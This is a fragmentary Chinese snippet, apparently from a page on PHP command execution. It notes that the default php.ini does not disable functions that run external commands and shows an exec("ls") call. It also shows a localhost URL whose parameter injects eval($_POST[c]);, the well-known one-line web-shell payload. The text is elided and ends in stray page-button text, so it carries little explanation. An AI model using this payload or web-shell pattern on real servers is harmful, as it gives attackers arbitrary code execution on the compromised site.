默认php.ini配置文件中是不禁止你调用执行外部命令的函数的。 ... echo exec("ls",$file); ... http://localhost/test2.php?u=eval($_POST[c]);.
確定! 回上一頁